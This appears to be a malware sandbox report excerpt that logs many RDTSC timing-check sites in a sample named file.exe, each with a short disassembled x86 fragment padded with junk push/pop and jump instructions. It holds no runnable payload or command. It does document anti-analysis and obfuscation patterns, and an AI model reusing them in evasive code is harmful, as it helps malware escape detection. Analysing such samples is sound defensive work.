Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B878 second address: 129B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B88D second address: 129B893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E868 second address: 129E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E86C second address: 129E87B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E87B second address: 129E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E882 second address: 129E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E9B4 second address: 129E9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129ED52 second address: 129ED56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3035 second address: 12A303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A303A second address: 12A303F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A303F second address: 12A304D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6778CEBE46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A304D second address: 12A3063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F67787C018Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3063 second address: 12A3088 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6778CEBE46h 0x00000008 jnc 00007F6778CEBE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6778CEBE51h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A31D9 second address: 12A31F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3356 second address: 12A335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A335A second address: 12A335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A335E second address: 12A3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34C3 second address: 12A34E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F67787C0194h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34E6 second address: 12A34EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34EA second address: 12A34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34F0 second address: 12A34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34F6 second address: 12A3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 pushad 0x00000008 jp 00007F67787C0186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3513 second address: 12A3519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A364E second address: 12A3656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3656 second address: 12A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC27 second address: 124EC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA4C second address: 124FA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA52 second address: 124FA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA56 second address: 124FA9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movzx edx, dx 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6778CEBE48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov ecx, edi 0x0000002e nop 0x0000002f push ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA9D second address: 124FAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FAA1 second address: 124FAA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A7A second address: 12A3A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A83 second address: 12A3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A89 second address: 12A3A93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A93 second address: 12A3A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A99 second address: 12A3ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jnp 00007F67787C019Eh 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A456E second address: 12A45CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnc 00007F6778CEBE5Dh 0x00000017 pushad 0x00000018 jp 00007F6778CEBE46h 0x0000001e jng 00007F6778CEBE46h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b popad 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA18 second address: 12ABA3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F67787C0186h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F67787C0191h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA3A second address: 12ABA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA3E second address: 12ABA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F67787C018Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9FB3 second address: 12A9FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA7E4 second address: 12AA7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAA9A second address: 12AAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAAA0 second address: 12AAAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAAA6 second address: 12AAAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD6A second address: 12AAD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F67787C0186h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD75 second address: 12AAD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD7A second address: 12AAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD80 second address: 12AADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE58h 0x00000009 jmp 00007F6778CEBE4Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F6778CEBE66h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB677 second address: 12AB683 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB683 second address: 12AB6CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnp 00007F6778CEBE52h 0x00000012 jne 00007F6778CEBE46h 0x00000018 jp 00007F6778CEBE46h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F6778CEBE4Eh 0x00000028 jbe 00007F6778CEBE58h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0426 second address: 12B0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F67787C018Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0442 second address: 12B0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE57h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AF985 second address: 12AF989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AF989 second address: 12AF98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFAEF second address: 12AFAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFAF3 second address: 12AFB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 jnc 00007F6778CEBE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F6778CEBE46h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFB13 second address: 12AFB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFECF second address: 12AFED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFED3 second address: 12AFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFEE2 second address: 12AFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE59h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0029 second address: 12B002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B002D second address: 12B003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDBBF second address: 12BDBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F67787C0186h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BBD59 second address: 12BBD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BBD5F second address: 12BBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC655 second address: 12BC659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC659 second address: 12BC65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA2D second address: 12BCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA33 second address: 12BCA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA37 second address: 12BCA82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6778CEBE46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6778CEBE53h 0x00000014 jmp 00007F6778CEBE4Ch 0x00000019 popad 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 jg 00007F6778CEBE52h 0x00000026 jng 00007F6778CEBE46h 0x0000002c ja 00007F6778CEBE46h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA82 second address: 12BCA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA88 second address: 12BCAA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA61 second address: 12BDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA67 second address: 12BDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA74 second address: 12BDA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BB913 second address: 12BB919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BB919 second address: 12BB91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C2E41 second address: 12C2E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C76FC second address: 12C7700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7700 second address: 12C7706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7706 second address: 12C7710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7307 second address: 12C7315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7315 second address: 12C731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C731B second address: 12C7327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7327 second address: 12C732C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83B4 second address: 12D83BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83BA second address: 12D83CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F67787C019Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83CB second address: 12D83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83D1 second address: 12D83D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DBB95 second address: 12DBBA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB870 second address: 12DB87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F67787C0186h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB87E second address: 12DB887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB887 second address: 12DB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E00C2 second address: 12E00FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F6778CEBE46h 0x00000012 jmp 00007F6778CEBE54h 0x00000017 jp 00007F6778CEBE46h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E00FA second address: 12E0124 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jl 00007F67787C0188h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F67787C0193h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E0124 second address: 12E0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E47FB second address: 12E4801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
